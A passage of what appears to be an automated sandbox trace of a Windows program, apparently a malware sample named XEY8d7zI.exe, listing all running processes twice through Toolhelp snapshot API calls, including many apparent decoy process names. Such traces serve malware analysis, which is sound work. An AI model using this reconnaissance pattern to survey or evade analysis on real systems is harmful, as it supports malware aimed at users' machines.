szExeFile="csrss.exe")) returned 1 [0104.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.498] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.501] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.503] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.504] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.505] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.506] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.508] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.509] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.513] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.514] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.648] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.650] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.651] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0104.652] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0104.653] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0104.654] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) 
returned 1 [0104.655] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0104.656] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0104.657] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0104.658] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0104.660] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0104.661] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0104.662] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="manuals_z.exe")) returned 1 [0104.663] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0104.664] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0104.665] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0104.666] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0104.667] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0104.668] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0104.669] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0104.670] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0104.671] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0104.672] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.673] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0104.674] CloseHandle (hObject=0xc4) returned 1 [0104.674] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0104.689] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.690] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0104.748] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0104.748] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.749] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0104.750] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0104.750] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0104.751] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0104.752] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0104.752] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0104.753] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.754] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.754] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.755] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.756] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.756] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0104.757] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0104.759] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.761] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0104.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0104.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0104.765] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0104.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0104.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0104.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0104.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0104.772] Process32NextW 
(in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0104.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0104.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0104.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0104.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0104.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0104.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0104.782] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0104.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0104.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 